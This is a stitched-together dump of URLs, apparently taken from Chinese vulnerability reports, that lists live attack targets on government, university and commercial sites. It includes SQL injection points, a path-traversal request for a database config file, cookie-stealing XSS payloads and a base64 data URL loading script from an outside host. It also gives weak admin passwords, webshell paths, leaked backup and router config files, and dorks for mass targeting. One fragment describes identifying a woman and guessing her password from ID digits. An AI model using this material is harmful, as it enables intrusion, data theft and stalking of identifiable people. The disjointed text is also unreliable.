https://fssj.ynf.gov.cn/sjpt/login.action http://221.179.6.136:8080/ http://struts.apache.org/release/2.3.x/docs/s2-016.html http://g.hn165.com/active/online/0806/index.html http://218.61.60.218/productadmin2/ckfinder/userfiles/frame/hn.html http://**.**.** admin:admin弱口令登录成功。 http://**.**.** http://chl.sxfpay.cn/login.action http://tianjinrd.sinosteel.com/index.asp http://tianjinrd.sinosteel.com/kjzjs.asp?id=36 http://fangtan.eduu.com/i/2526581 http://fangtan.eduu.com/i/3043854(请管理员删除) http://eoffice.sccm.cn/building/urlurl.php http://eoffice.sccm.cn/inc/attach.php?OP=1&ATTACHMENT_NAME=../../mysql_config.ini&ATTACHMENT_ID=5402024843 http://www.xunje.com/jiemian.htm http://yanshi.xunje.com/mv.aspx?movieID=71a8e0b8-384e-4d87-a3ee-a8f327cf7446 http://www.xunje.cn/mv.aspx?movieID=3f18d303-6ab1-4545-b4e6-9c44f17fdac7 http://112.85.215.186/turn.aspx?movieID=9fb3f41b-4718-4b85-bd49-1a2282cdb0e0 http://dy.nc169.com:8088/turn.aspx?movieID=ea671cc2-2e36-4016-a34e-d07a2cb3bdbd http://bd.wangbadianying.com/mv.aspx?movieID=2984be84-6aa1-4128-ab7b-47d5098dfc1c http://218.22.185.18:8000/turn.aspx?movieID=b1ebe74d-75bb-41f1-8238-9a93ef15f634 http://www.tz9158.com/turn.aspx?movieID=daaa5ca1-a7bc-4d90-a8fd-1c40b82f46a1 http://tz9158.com/turn.aspx?movieID=3eed3dcb-42d2-4f81-a963-65fbe57b87ce http://bbs.share.youku.com。 http://bbs.share.youku.com/home.php?mod=space&uid=1 http://xiaoyou.zhumeng365.net http://192.168.1.1/js/forbidView.js里 http://www.dxcs.gov.cn http://nbhsfy.gov.cn http://xs.nbtravel.gov.cn http://oa.nbdpri.gov.cn http://www.dsjd.gov.cn http://volunteer.nbcg.gov.cn http://nbyx.org.cn http://www.sinochem-nb.com/UserInfo/files.aspx http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=Demonm&bookid=&orderstr=flower'&px=asc&Curpage=1&mtype=&stype= http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=Demonm&bookid=&orderstr=flower&px=asc&Curpage=1&mtype=&stype= http://product.china-pub.com/member/bookpinglun/memberpl.asp?membername=%3C/title%3E%3Cscript%3Ealert%28%29%3C/script%3E%3Ctitle%3E http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark= http://member.china-pub.com/member/mypub/Handdle/DelMarks.ashx?id=1591 http://member.china-pub.com/member/mypub/Handdle/AddRemark.ashx?mark= http://www.eastfair.com/fair/admin/login_sys.asp http://119.254.81.197:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://61.191.17.216:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://oa.gxfz.org:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://222.178.221.54:7001/defaultroot/equipment/equipmentApplyCancel.jsp?recordId=1 http://www.zkyxls.com/index.php/Art/show?i=5959其中的参数i是注入点。注入点证明信息如下: http://law.szu.edu.cn/news_Article.asp?ClassCode=00020001&ArticleID=2322 http://jinzhong.szu.edu.cn/jz/Website.jsp?t=3&news_id=20140625101445 http://norc.szu.edu.cn/Website.jsp?t=3&cid=10000&clid=10003&nid=20140811121319 http://renmai.weibo.com/ http://wan.7k7k.com/login.php http://202.109.244.108:8086/xmkjzc/wsbbAction!register.xhtml http://sdb.csdl.ac.cn/mycscd/view/m06/A0600.xhtml http://www.tyut.edu.cn/wuli/ooe/common.asp?id=16 http://202.115.133.161/ http://e.tju.edu.cn/Service/serviceBrowse.do?class_id=04 http://localhost/test/maccms/index.php?m=user-save.html http://beijing.homelink.com.cn/cmsmanage/ site:bjfu.edu.cn http://202.204.115.67/xueshengxinxichaxun/search.htm学生信息查询,确认是她本人,新闻上说10年入学园林专业。 site:bjfu.edu.cn http://info.bjfu.edu.cn的初始密码为身份证前六位或八位,脚本跑了一遍发现返回大小都一样,不是她改过密码就是我没办法判断返回正确。放弃之。 http://61.136.82.103:8080/ http://www.chuanke.com/1440953-99413.html https://pay.chuanke.com/st/PrePay?r=1410187027 http://www.chuanke.com/?mod=quiz&act=quizlib&do=create http://114.112.70.243/ http://www.stats.gov.cn/ http://116.228.55.143:9002/Home/Index# id:admin pass:123456 http://bbs.rom.baidu.com/ http://www.mod.gov.cn/ http://imgcdn.house.sina.com.cn/jquery.js/1.php http://itbbs.pconline.com.cn/bbs/51747686.html http://yunjiasu.baidu.com/analytics/summary_report/?filter_site=im286.com http://bm.mbachina.com/wenda/posts/reply?id=678%E2%80%98 http://user.mbachina.com/wenda/posts/reply?id=167%27 http://202.106.159.90/app/jsp/member/sinoform/memberRegistration.jsp?formId=2011082723132377981 http://202.106.159.93/app/jsp/member/sinoform/memberRegistration.jsp http://202.106.159.90/affixPath/affixDIR/photo/1410234270278/1.jsp http://www.polytheatresz.com/ http://www.fcchbj.com/ http://www.polytheatre.com/ http://www.dgyldjy.com/ http://www.polytheatre.com/search http://app.juesheng.com/member/yctiku.php?app=yctktk&tid=37 http://www.fymjjj.com/ http://www.pop1st.com/ http://www.jingzhipeng.com/ http://www.canakkale.com.cn/ http://www.unotimes.com/ http://www.athink.org/ http://www.bcghotel.com/ http://www.zcdiamond.com/ http://guanghua365.com/ http://www.samewayart.cn/ http://www.lc787.com/case.html http://mba.xju.edu.cn/ http://cs.ganji.com/fuwu_dian/1141783323x/cuxiao/31701/ http://wuxi.eda.ac.cn/chat/change_nickname.php页面的cookie中的sessionid参数 http://www.ah165.net/shop/ http://www.ah165.net/shop/order/query/list?time=1410239213386&cardType=1&ecwmp_page_curPage=1&ecwmp_page_pageSize=10&idCard=a&id_orderSn=a http://www.ptsn.net.cn/ http://www.ccsa.org.cn/ http://mail.ptsn.net.cn http://webmail.ccsa.org.cn/ http://www.tlc.com.cn/ http://www.tc485.cn/ http://www.ptsn.net.cn/phpMyAdmin/ http://www.ccsa.org.cn/recorder/display.php?id=726 http://www.ccsa.org.cn/recorder/display.php?id=726 inurl:TransactList.aspx?ItemName= inurl:broadcastview.aspx?InfoId= inurl:OnlineQuery/QueryList.aspx http://www.whsfzb.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.ytshenpi.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.rcsp.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.lcxzfw.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.xtsxzfw.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://www.qjxzsp.com/langchao.ecgap.outportal//Broadcast/displayNewsPic.aspx?id=00187 http://www.wdaac.cn//Broadcast/displayNewsPic.aspx?id=00187 http://www.sdsp.cn//Broadcast/displayNewsPic.aspx?id=00187 http://www.shspzx.gov.cn//Broadcast/displayNewsPic.aspx?id=00187 http://222.135.78.34:8089//Broadcast/displayNewsPic.aspx?id=00187 http://www.dftzfw.cn/waiwang//Broadcast/displayNewsPic.aspx?id=00187 http://shenpi.xuchang.gov.cn//Broadcast/displayNewsPic.aspx?id=00187 http://www.hdamo.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://221.176.217.34/szrx//Broadcast/displayNewsPic.aspx?id=00187 http://www.e.lfang.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://xzsp.jianggan.gov.cn:8080/Broadcast/displayNewsPic.aspx?id=00187 http://zmdxzfw.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://shenpi.changge.gov.cn/Broadcast/displayNewsPic.aspx?id=00187 http://xzfw.ningde.gov.cn/Broadcast/displayNewsPic.aspx?id=00187/**/and/**/1=user http://localhost/admin.php?mod=admin&act=add Http://192.168.1.120/1.html http://localhost/admin.php?mod=admin&act=add http://music.google.cn/search?newwindow=1&site=webhp&q=inurl%3Afuwu_list.asp%3Fid&btnG=Google+%E6%90%9C%E7%B4%A2 http://www.sxhdct.com/fuwu_list.asp?id=65 http://www.shanghaizhongmin.com/news_list.asp?id=58 http://www.dgsytz.com/fuwu_list.asp?id=55 http://www.whjcrh.com/fuwu_list.asp?id=56 http://www.sywssp.com/news_list.asp?id=54 http://www.sz-zdy.com/news_list.asp?id=57 http://www.njxietong.com/news_list.asp?id=59 http://www.ahxyqz.com/news_list.asp?id=66 http://www.jxrsq.com/news_list.asp?id=55 http://www.fjbjxy.com/news_list.asp?id=74 http://www.fjbjxy.com/news_list.asp?id=74 http://www.sdkunde.com/fuwu_list.asp?id=64 http://www.fs-guancheng.com/fuwu_list.asp?id=55 http://www.nbtfyy.com/fuwu_list.asp?id=59 http://www.sdbrg.com/fuwu_list.asp?id=69 http://www.slcxkj.com/fuwu_list.asp?id=59 http://www.cqydfl.net/rc_list.asp?id=4 http://www.tianyuemotor.com/news_list.asp?id=68 http://www.jinfenganxin.com/news_list.asp?id=74 http://www.bjfxnt.com/news_list.asp?id=57 http://www.jstzjf.com/news_list.asp?id=32 http://www.jymyms.com/news_list.asp?id=57 http://www.szhmsl.com/news_list.asp?id=58 http://www.jjhainiu.com/news_list.asp?id=57 http://www.dgytblg.com/news_list.asp?id=73 http://www.chuduhengkang.com/news_list.asp?id=32 http://www.zhonghuajiaji.com/new_list.asp?id=54 http://www.fjtlly.com/news_list.asp?id=73 http://www.jshdhn.com/news_list.asp?id=74 http://www.zzxyy8.com/news_list.asp?id=74 http://www.wandashiyou.com/news_list.asp?id=99 http://www.tjhrl.com/news_list.asp?id=69 http://www.scysjs.com/news_list.asp?id=32 http://www.shxzbz.com/news_list.asp?id=70 http://www.szhdmc.com/news_list.asp?id=55 http://www.szcszlkt.com/news_list.asp?id=55 http://jjytrade.com/news_list.asp?id=72 http://www.jyhongfa.com/news_list.asp?id=69 http://www.nckcxx.com/new_list.asp?id=86 http://www.yyjszj.com/fuwu_list.asp?id=66 http://vip.stock.finance.sina.com.cn/q/view/hk_economic_data.php?&type=jlxfwjzs http://vip.stock.finance.sina.com.cn/q/view/hk_economic_data.php?&type=jlxfwjzs http://stock.finance.sina.com.cn/manager/api/jsonp.json/var%20p100025=/FundManagerService.getMoneyHistoryNav?symbol=100025&begin=20130825&end=20140909&_=9 http://localhost/index.php?do=user http://localhost/index.php?do=seller&id=5529 http://localhost/index.php?do=pubgoods http://localhost/admin/index.php?do=user&view=charge&valid=1&maxCash=100&maxCredit=&user=5529&cash_type=1&cash=100&charge_reason=&is_submit=1 http://gcloudtest.gac-toyota.com.cn:8005/Default1.aspx http://www.itscholar.com/ http://www.itscholar.com/itsviewtopic.php?f=21&t=1722 http://housing.jinti.com/aspx/aspx/GetManageURL.aspx?act=stop&ID=29504324&areaid=439&depareaid=826&spotareaid=1440&category=159&reurl=http%3a%2f%2fhousing.jinti.com%2faspx%2faspx%2fPerson_my_posts_all.aspx http://housing.jinti.com/shanghai-changfangchuzu/d32062188.htm http://tz.xmchengdu.gov.cn/Zftz/NewWeb/NewsDetail.aspx?itemID=000147 http://www.viewgood.com/ http://demounicom.viewgood.com/SPM/pc/themes/default/default.aspx http://www.youhui6.com/shop/product!index.action网站, http://t.vic.sina.com.cn/201309nba/forum/fans/rank_list?forum_id=17&order_field=post_num&order_type=DESC&page_no=3 http://zz.speiyou.com/search/index http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea http://zz.speiyou.com/search/index/grade:ff808081427f932601428f4484932916/subject:/level:bx/term:/gtype:tea http://aigu.stcn.com/pay.action sh.118100.cn/present/user/useraction!weblogin.action http://hbdjfy.gov.cn/index.php?act=about&id=40 http://www.ahwlh.com/index.php?act=about&id=42 http://www.hbsjsbyy.com/index.php?act=about&id=7 http://www.huaibeiyuxin.com/index.php?act=about&id=7 http://www.zhongkangyuan.net/index.php?act=about&id=7 http://www.ahhzjt.com/index.php?act=about&id=22 http://www.jinsexitang.com/index.php?act=about&id=28 http://www.hbsxmsysc.cn/index.php?act=news&id=22 http://www.sxbjamxh.com/index.php?act=news&id=24 http://www.ylscgyg.com/index.php?act=about&id=44 http://www.hbdonjin.com/index.php?act=about&id=44 http://rd.lieshan.gov.cn/index.php?act=about&id=55 http://ahjjmp.l34.goodnic.net/index.php?act=about&id=45 http://www.hbygjd.cn/index.php?act=about&id=42 http://www.hbzdct.com/index.php?act=about&id=36 http://jifen.jiajiaoban.com/ http://jifen.jiajiaoban.com/students/notice/41 http://www.flyhigh.com.cn/admin.php http://www.flyhigh.com.cn/?ac=content&id= http://www.flyhigh.com.cn/shell.php http://www.591sq.com/daka/daka.jsp; www.vindapaper.com/vindapaper.zip http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register http://sj.com/1.swf http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818/uploads/index.php?case=user&act=register http://www.zhongchou.cn/user-modifypassword www.zhongchou.cn http://www.zhongchou.cn http://learning.bankofshanghai.com/jmx-console/ http://61.50.254.192/Login.action http://210.51.167.63/ http://admin.ifttt.gfan.com/ http://admin.ifttt.gfan.com/phpinfo.php http://admin.ifttt.gfan.com/backup.zip http://admin.ifttt.gfan.com/lib/config.php IP:220.181.150.247:443 http://www.foyoedu.com/) http://www.tcedu.com.cn/module/sitesearch/index.jsp?columnid=120 file://y http://xxx.xxxx.cn inurl:/Docs/Commentlist.aspx?ItemID= http://ndxbskb.imu.edu.cn/mwb/Docs/Commentlist.aspx?ItemID=22 http://www.sqlmap.org http://support1.lenovo.com.cn/lenovo/wsi/station/servicestation/Api/QueryMap.ashx?area=022&type=%E5%8F%B0%E5%BC%8F&stationId= http://telhosting.xinnet.com/ http://drops.wooyun.org/tips/409 http://118.144.75.80:8081/web/index?language=cn inurl:edoas2/,或inurl:edoas/ http://temai.baidu.com/SearchIndex/Index?wd=%22%20onmousemove=alert%281%29%20a=%22&from=searchinput http://www.tclbattery.com/help.php http://battery.tcl.com/help.php http://www.tclbattery.com/php.php http://evod.zjtcm.net/ FwVer:3.11.2.176_TC3086 HwVer:T14.F7_6.0 http://www.shodanhq.com/search?q=TD-8820 http://地址/rom-0 http://222.240.26.10/ http://124.135.20.122/rom-0 http://wap.baidu.com/error.jsp?bd_page_type=1ceqre%22%3E%3Cimg%20src=%22x%22%20onerror=%22alert%28document.cookie%29%22%3Ewre%3Ca%20href=%22 http://bbs.jjwxc.net/board.php?board=43&subid=0&type= http://210.21.59.57:99/test/kq.mdb http://addon.discuz.com/?@mpage_sign.plugin dps_sign:sign http://magazine.tcl.com/info.aspx http://download.ime.sogou.com/1409918988/sogou_pinyin_72k.exe?st=VF2xLEaDa6Xb3rKzoLo7Pg&e=1410411894&fn=sogou_pinyin_72k.exe http://ecard.gdqy.edu.cn/indexmanagerLogin.action http://ykt.hebut.edu.cn/indexmanagerLogin.action http://kwzx.hrbcu.edu.cn/indexmanagerLogin.action http://ecar.hrbust.edu.cn/indexmanagerLogin.action http://ecard.jxust.cn/indexmanagerLogin.action http://yktcx.njmu.edu.cn/indexmanagerLogin.action http://ecard.qau.edu.cn/indexmanagerLogin.action http://ecard.shjgxy.net/indexmanagerLogin.action http://yktcx.tjut.edu.cn/indexmanagerLogin.action http://ecard.tust.edu.cn/indexmanagerLogin.action http://ecard.tyut.edu.cn/indexmanagerLogin.action http://ecard.utsz.edu.cn/indexmanagerLogin.action http://finance.unisk.com.cn/ http://202.100.252.120:8080/ http://wooyun.org/bugs/wooyun-2010-064440 http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://210.36.80.99/pks/pksdj.aspx?xxid=50870 http://210.36.80.99/pks/pksdj.aspx?xxid=50870 http://www.pishu.com.cn/skwx_ps/initDatabaseDetail?siteId=14&contentId=1816755&contentType=literature http://www.pishu.com.cn/skwx_ps/multimedia/download?ID=2217777&siteid=14&Type=literature http://www.nenu.edu.cn/professor/pro/yul/c_jbxx_new.php?id=1112 http://szjbh.szcw.cn/contact.php?id=235 http://oyxtl.szcw.cn/contact.php?id=359 http://szhl.szcw.cn/contact.php?id=256 http://szhdskd.szcw.cn/contact.php?id=83 http://szhmdz.szcw.cn/contact.php?id=304 http://wjdr.wj.szcw.cn/contact.php?id=288 http://active.szcw.cn/bmpost/form.asp?infoid=328 http://58.213.147.236:8080/admin/admin_login.asp http://58.213.147.236:8080/admin/ImageNews/2013913105324948.asa http://58.213.147.236:8080/admin/ImageNews/xx.asp http://58.213.147.236:8080/admin/ImageNews/20135232134465.asp http://www.dafeng.js.cn/)的主页面上有两个后台管理系统:人大议案建议办理系统和政协提案办理系统 http://cqb.wuxi.gov.cn)多个后台管理系统登陆密码处存在SQL注入 http://youth.whut.edu.cn/wwwroot.rar http://club.show.sina.com.cn/uc_server/ http://58.22.154.146:15693/ http://58.22.154.146:15693/gsm/qq_1.asp?Submit=%C3%88%C2%B7%C2%B6%C2%A8&user=1 http://58.22.154.146:15693/gsm/qq_1.asp?user=1就是注入点 http://tryw.henu.edu.cn/ketizu.asp?ktzid=1 http://eme.meteni.com/UserCenter/EditSign.aspx)未过滤输入内容,导致可以直接插入js代码并在个人信息页面被加载执行; http://eme.meteni.com/Vip/TopicCoursesEdit.aspx?Id=xxxx)未对上传课程资料类型进行限制,可直接上传asp、aspx脚本并执行; http://222.240.131.189:10080/toLoginPage.do http://113.57.132.2:83 http://113.57.132.2:83/alert.txt http://wap.gouwu.sogou.com/search#shop/query=%3Cscript%3Ex%3Ddocument.cookie%3Balert%28x%29%3B%3C%2Fscript%3E&sourceid=si_tbtn&ie=utf-8 http://地址/tmp/3200-config.bin http://218.25.78.243/tmp/3200-config.bin http://www.baidu.com data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL2prZ2gwMDYuYnlldGhvc3QxNy5jb20vdF94LmpzID48L3NjcmlwdD4= http://www.zhihuihb.net/ http://www.haierdianzi.com/huaxiaadmin/ http://www.kitchenhaier.com/huaxiaadmin/ http://www.purcotton.com/mall/mianroujin/vote.ihtml http://res.purcotton.com/mres/res/mall/js/member/vote.js http://www.purcotton.com/mall/zixunvote/getVoteNum.ihtml num:116 num:116},确认可以注入。 http://www.aa.gov.cn/System/sys0_inc_voteresult.asp?VoteID=1 http://202.197.120.18/st10542/business/login.jsp http://wygs.nbu.edu.cn/Bbsshow.asp?ID=6 http://www.zzxingce.com/admin/ http://loupan.house.yzdsb.com.cn/?a=search&f=&s=&p=&e=&t=&r=&h=&d=&w= http://ka.2366.com/cardlist_1.php?gid=4340&rcname=%E4%BC%9A%E5%A5%BD%E7%8E%A9 http://ka.2366.com/cardlist_1.php?gid=4340&rcname=%E4%BC%9A%E5%A5%BD%E7%8E%A9 http://q.k189.cn/activity/Llqqb/index/loginAction.xml http://q.k189.cn/activity/Llqqb/index/loginAction.xml http://youth.whut.edu.cn/Admin_Youth/Login.aspx http://gaj.laixi.gov.cn/clist.jsp?id=7516 http://gaj.laixi.gov.cn/list.jsp?id=6715 http://jiaotong.laixi.gov.cn/list.jsp?id=6737 http://jiaotong.laixi.gov.cn/clist.jsp?id=7603 http://xmj.laixi.gov.cn/list.jsp?id=7287 http://kjj.laixi.gov.cn/list.jsp?id=6671 http://jgswgl.laixi.gov.cn/clist.jsp?id=7592 http://jgswgl.laixi.gov.cn/list.jsp?id=7039 http://career.sdju.edu.cn/dianjiweb/conformid.asp?Tid=e http://app.qiushibaike.com:3000 http://dg.uninx.com:8481/dgpt/endpage.php?gid=87&shopid=4 http://dg.uninx.com/dgpt/endpage.php?gid=183&shopid=5 www.ssap.com.cn/ceshi.rar www.ssap.com.cn/admin.rar http://test.ssap.com.cn/admin/ http://baike.ssap.com.cn http://music.google.cn/search?q=inurl:managerOneGgxxfb.action&newwindow=1&site=webhp&ei=u5ERVI_ULJfm8AX8v4CQDQ&start=40&sa=N http://ecard.sjtu.edu.cn/homeLogin.action http://ecard.sdu.edu.cn/homeLogin.action http://ecard.utsz.edu.cn/homeLogin.action http://card.tjfsu.edu.cn/homeLogin.action http://ecard.tust.edu.cn/homeLogin.action http://www.ykt.sdnu.edu.cn/homeLogin.action http://xyk.jlnu.edu.cn/homeLogin.action http://www.ecard.ldu.edu.cn/homeLogin.action http://ecard.scau.edu.cn/homeLogin.action http://www.ecard.sdwu.edu.cn/homeLogin.action http://id.gzu.edu.cn/homeLogin.action http://ecard.jxust.cn/homeLogin.action http://211.64.8.8/homeLogin.action http://cco.tjufe.edu.cn/homeLogin.action http://ykt.hzau.edu.cn/homeLogin.action http://ykt.hebut.edu.cn/homeLogin.action http://yktcx.njmu.edu.cn/homeLogin.action http://ecard.ctbu.edu.cn/homeLogin.action http://ecard.hycollege.net/homeLogin.action http://www.kuaidin.com/homeLogin.action http://card.dgpt.edu.cn/homeLogin.action http://kwzx.hbue.edu.cn/homeLogin.action http://ecard.tyut.edu.cn/homeLogin.action http://ecard.ouc.edu.cn/homeLogin.action http://card1.upc.edu.cn/homeLogin.action http://www.nnfwwb.gov.cn/ http://srdp.ouc.edu.cn/fckeditor/_samples/default.html http://test.ssap.com.cn/ http://test.ssap.com.cn/api/ http://www.ssap.com.cn http://www.ssap.com.cn/member/OrderAddress.ashx?type=0&Code=120000 http://www.hxjjjc.gov.cn/article.php?MsgId=70313 http://www.hxjjjc.gov.cn/summaryarticle.php?MsgId=44820 http://www.ahjjjc.gov.cn/summaryarticle.php?MsgId=44820 http://www.whjjw.gov.cn/summaryarticle.php?MsgId=44820 http://www.hnsjw.cn/summaryarticle.php?MsgId=44820 http://www.szsjw.gov.cn/summaryarticle.php?MsgId=44820 http://www.dsjjjc.gov.cn/summaryarticle.php?MsgId=44820 http://www.aqtcjjjc.gov.cn/summaryarticle.php?MsgId=60321 http://www.whjjw.gov.cn/summaryarticle.php?MsgI http://admin.zdnet.com.cn/global_check/check.php?act=check&key=G61Pb0dPZZbHKePl7Xzw http://www.trip8080.com/ask/ http://www.loufeng.gov.cn/xinwen.php?tid=1 http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/IO.XSRV2.CallbackList['6kMjVzyfUpC0wo3L']/NetValue_Service.getNetValueOpen?page=1&num=40&sort=nav_date&asc=0&ccode=80000222&type2=0&type3= http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/IO.XSRV2.CallbackList['6kMjVzyfUpC0wo3L']/NetValue_Service.getNetValueOpen?page=1&num=40&sort=nav_date&asc=0&ccode=80000222 http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/IO.XSRV2.CallbackList['6kMjVzyfUpC0wo3L']/NetValue_Service.getNetValueOpen?page=1&num=40&sort=nav_date&asc=0&ccode=80000222 http://jiudian.trip8080.com/orderSubmit.jspx?callback=jsonp1410511463418&hid=7284&rid=73079&pid=50042&cid=33&rm=1&tm1=2014-09-14&tm2=2014-09-16&guest=%2525E5%2525BC%2525A0%2525E8%25258C%2525AB%2525E8%25258C%2525AB&mobile=13047661205&roomPrice=270&userEmail=&latetime=06%3A00&keepTime=23%3A59-06%3A00&totalPrice=0 http://zone.wooyun.org/content/744 http://zone.wooyun.org/content/744的一个实例测试。感谢大神们分享技术 http://127.0.0.1/ecshop2.7.4/csrf.js http://127.0.0.1/ecshop2.7.4/csrf.js http://127.0.0.1/ecshop2.7.4/admin/sql.php http://221.204.12.39/ http://www.tfxfdc.com/pubinfo/Moreysxk.asp?Qryqyxmbm=DBDHDADCDADADADJDDDBDCDF000002 http://www.hsfdc.com/web/PubInfo/Moreysxk.asp?Qryqyxmbm=DBDHDADCDADADADBDDDBDCDD000001 http://www.rich-healthcare.com/admin/index.aspx存在弱口令admin/admin http://121.14.4.151:81/toIcp.action GOOGLE:inurl:opac_two http://211.68.68.197/opac_two/mylibrary/comment/queryAllComment.action http://219.218.26.4:85//opac_two/mylibrary/comment/queryAllComment.action http://218.107.150.8/opac_two/mylibrary/comment/queryAllComment.action http://219.242.31.130:8080//opac_two/mylibrary/comment/queryAllComment.action http://202.118.84.134:8080//opac_two/mylibrary/comment/queryAllComment.action http://202.205.160.120:8080//opac_two/mylibrary/comment/queryAllComment.action http://opac.lnu.edu.cn//opac_two/mylibrary/comment/queryAllComment.action http://202.197.224.89:8088//opac_two/mylibrary/comment/queryAllComment.action http://202.118.8.2:8080//opac_two/mylibrary/comment/queryAllComment.action http://210.77.83.73:8080//opac_two/mylibrary/comment/queryAllComment.action http://202.204.234.3:100//opac_two/mylibrary/comment/queryAllComment.action http://kaitong.cafa.com.cn:8080/opac_two/mylibrary/comment/queryAllComment.action http://lib.fjjxxy.cn:8080/opac_two/mylibrary/comment/queryAllComment.action http://202.4.153.19:8080/opac_two/mylibrary/comment/queryAllComment.action http://219.218.26.4:85//opac_two/mylibrary/comment/queryAllComment.action http://222.29.99.40:8080//opac_two/mylibrary/comment/queryAllComment.action http://www.baidu.com/s?wd=%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89%28C%29%09%09%E8%B5%9B%E9%A3%9E%E8%BD%AF%E4%BB%B6%20SINCE%201998&pn=60&oq=%E7%89%88%E6%9D%83%E6%89%80%E6%9C%89%28C%29%09%09%E8%B5%9B%E9%A3%9E%E8%BD%AF%E4%BB%B6%20SINCE%201998&ie=utf-8 http://www.slssoft.com/Web/Index/WebDetail/ServiceGuide http://sps.isoffice.cn/ http://www.slssoft.com/Web/Index/WebDetail/customer http://sps.isoffice.cn/ http://www.epaylinks.cn/www/index.jsp http://www.epaylinks.cn/jmx-console/会出现错误信息, http://sh.passport.189.cn/ http://125.88.254.131:8080/nms/login.do http://www.luolong.gov.cn/wms/vote/vote_view.php?id=4 http://www.wsjhszx.org.cn/admin-wsj-w/FCKhtml/editor/filemanager/connectors/asp/conn.asp http://www.slssoft.com/ http://baike.baidu.com/view/5222614.htm?fr=aladdin http://oa.isoffice.cn/ http://www.slssoft.com/Web/Index/WebDetail/customer http://oa.isoffice.cn/StudyInfo/PersionInfoList.aspx http://oa.isoffice.cn/Project/ProjectType.aspx?CName=C&Title=%CE%EF%D7%CA%C0%E0%B1%F0&TableName=MaterialInfo http://baby.maimiaojie.com:8080/mysql/add_user.php http://nx.bbn.com.cn/biz/czcp.php?biz_id=436&tag=1&p_id=3216 http://nx.bbn.com.cn/lgy_nzdj/index2.php?member_id=19399&ID=2149 http://www.qidian.com.tw/ http://www.qidian.com.tw/members/sithle http://locate.189.cn/ http://locate.189.cn:7070/site/register http://218.104.188.186/ http://218.104.188.186/wuyun.asp;.txt www.taikr.com www.osforce.cn www.chinahadoop.cn http://yun.itxdl.cn http://www.lampym.com http://www.meiyeedu.com http://www.17xueit.com/ http://www.yova.org/ http://222.143.53.1/login.jsp http://www.jd.com/pinpai/authcode.php?returnUrl=http%3A%2F%2Fwww.jd.com%2F search.360buy.com/core/XTest.php http://222.178.221.54:7001/defaultroot/InfoViewIframeAction.do?historyId=1&action=delHistory http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001 http://222.178.221.54:7001 http://222.178.221.54:7001/defaultroot/public/edit/admin/login.jsp http://oa.hongdou.com:7001/defaultroot/public/edit/admin/default.jsp http://oa.jiuhuashan.cc:7001/defaultroot/public/edit/admin/default.jsp http://www.portever.com:7001/defaultroot/public/edit/admin/default.jsp http://203.95.5.90:7001/defaultroot/public/edit/admin/default.jsp http://222.178.221.54:7001/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001/ http://222.178.221.54:7001 http://sme.swjtu.edu.cn/newsDetail.aspx?id=554 http://tuan.aili.com/wap/myaddress.php页面 http://tuan.aili.com/wap/ajax.php http://zcc.hunnu.edu.cn/CG_Content.aspx?id=1053&type=70 http://www.peiluyou.com:9999/isxunleiluyou?_act_=getRouterSetting&pdtid=3&routerId=&t=1410605628390 http://www.peiluyou.com:9999/getstatus?statusId=40&_act_=getWifi&pdtid=3&routerId=XXXXXXXX&uid=XXXX(迅雷UID)&t=1410605877578 http://www.peiluyou.com:9999/getconnectionsettings?_act_=getConnectionSettings&pdtid=3&routerId=XXXXXXXX&uid=XXXX(迅雷UID)&t=1410605870515 http://dynamic.i.xunlei.com/user)。怎么找到UID不在我说明范围,但是可以肯定的有地方肯定可以查到。 http://wooyun.org/bugs/wooyun-2014-064004 http://school.xrui.net/view.php?id=1665 http://222.178.221.54:7001/defaultroot/DossierBorrowAction.do?record=1&action=load” http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001 http://222.178.221.54:7001 http://m.antakids.com//1.php/ http://m.antakids.com/test/z1.html http://m.antakids.com/test/index.html http://market2.yesky.com/currentplay/view/template/images/51279269289.jsp?o=vLogin http://work.ch.gongchang.com/product/new/post inurl:index_gangwei_x_x.php url:http://211.154.133.111:8888/manager/html user:admin pass:admin http://www.huizhongcf.com/ www.huizhongcf.com http://js.t.sinajs.cn/t5/webim/swf/sync_storage.swf,该文件的addcallback添加的函数接口的返回值未经过滤,然后allowDomain允许一些白名单内的域名 site:com/jap.php site:gov.cn/jap.php http://www.ncct.gov.cn/ http://www.dyzjj.gov.cn/ http://www.lygtzyj.gov.cn/ http://www.dhhrss.gov.cn http://www.jfsly.gov.cn http://ncgyy.gov.cn/ http://www.lahrss.gov.cn/ http://www.weihailinye.gov.cn/ http://www.lsrs.gov.cn/index.html http://www.jlxrd.gov.cn/ http://person.amac.org.cn/pracnew/ http://cwcx.xtu.edu.cn:8004/grsr/Login.asp http://180.153.25.224/WeixinManagerWEB/Account/Login.aspx http://misc.360buyimg.com/purchase/swf/flashcookie.swf lines:301-324) 